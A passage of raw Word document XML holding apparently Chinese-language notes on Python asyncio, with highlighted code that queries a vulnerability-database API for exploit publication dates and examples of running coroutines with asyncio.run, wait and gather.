          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">await </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>client.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>post</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>url</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>url</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D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>json</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>={</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>"type"</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98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>"exploits"</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98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>"sort"</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98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>"date"</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98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>"query"</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98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>"cve"</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98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>"title"</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C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>False</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98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>"offset"</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D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>data_offset</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D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>headers</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>=headers)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        res_json = response.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>json</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res_list = []</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        exps = res_json[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>"exploits"</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C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">for </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">single_exp </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>exps:</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C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">if </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>single_exp.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>get</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>"published"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>)!=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>None</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single_exp_date = single_exp.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>get</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>"published"</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res_list.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>append</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(single_exp_date)</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56B6C2"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>print</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>data_offset</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>, res_list)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23233300" w14:textId="77777777" w:rsidR="004E0A17" w:rsidRPr="00C447B6" w:rsidRDefault="004E0A17" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6307A140" w14:textId="77777777" w:rsidR="00540925" w:rsidRDefault="00540925" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26C572B8" w14:textId="2F865306" w:rsidR="009F7C67" w:rsidRDefault="007766F8" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>执行异步函数的方法</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A3999C4" w14:textId="1AEC380E" w:rsidR="00A82865" w:rsidRDefault="00A82865" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方式</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00E10C9A">
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="00E10C9A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>执行单个异步函数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21FDE7D6" w14:textId="416C7E64" w:rsidR="0016655A" w:rsidRDefault="0016655A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="0016655A">
        <w:t>asyncio.run(main())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30043DAA" w14:textId="77777777" w:rsidR="00A82865" w:rsidRDefault="00A82865" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C9FAF34" w14:textId="72038753" w:rsidR="00A82865" w:rsidRDefault="00A82865" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方式</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00E10C9A">
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="00E10C9A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>执行异步函数列表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59FC5C31" w14:textId="77777777" w:rsidR="00943734" w:rsidRDefault="00943734" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>loop = asyncio.get_event_loop()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E6D6FA5" w14:textId="4169B0F9" w:rsidR="0016655A" w:rsidRDefault="00943734" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>loop.run_until_complete(asyncio.wait(task_list))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48C95CBA" w14:textId="3E482DAE" w:rsidR="00A82865" w:rsidRDefault="00177142" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>#</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注意，这种写法，需要</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>done</w:t>
      </w:r>
      <w:r>
        <w:t>, _ = xxx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，然后结果</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>done</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是一个列表，元素</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">result() </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>才是返回的结果</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="513F966F" w14:textId="77777777" w:rsidR="00177142" w:rsidRDefault="00177142" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75B991F4" w14:textId="022EF622" w:rsidR="00A82865" w:rsidRPr="00943734" w:rsidRDefault="00A82865" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方式</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="00E10C9A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="00E10C9A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>执行异步函数列表并获取返回值</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D1082FA" w14:textId="77777777" w:rsidR="00A23EAD" w:rsidRDefault="00A23EAD" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>loop = asyncio.get_event_loop()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08159FC7" w14:textId="7D7DA2D7" w:rsidR="0016655A" w:rsidRDefault="00A23EAD" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>results = loop.run_until_complete(asyncio.gather(*task_list))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0842A518" w14:textId="77777777" w:rsidR="00CC7906" w:rsidRPr="00CC7906" w:rsidRDefault="00CC7906" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D952534" w14:textId="396DD67B" w:rsidR="00507FD6" w:rsidRDefault="00507FD6" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>少量任务</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="475F4B28" w14:textId="77777777" w:rsidR="00507FD6" w:rsidRDefault="00507FD6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="190EB9BA" w14:textId="77777777" w:rsidR="007E6697" w:rsidRDefault="007E6697" w:rsidP="009222EB">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="282C34"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">import </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>asyncio</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">import </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>time</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">async def </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>say_after</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>delay</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D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>what</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C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">await </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>asyncio.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>sleep</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>delay</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56B6C2"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>print</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>what</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r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">async def </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>main</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task1 = asyncio.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>create_task</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61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>say_after</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>3</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98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>'hello'</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r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    task2 = asyncio.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>create_task</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61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>say_after</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
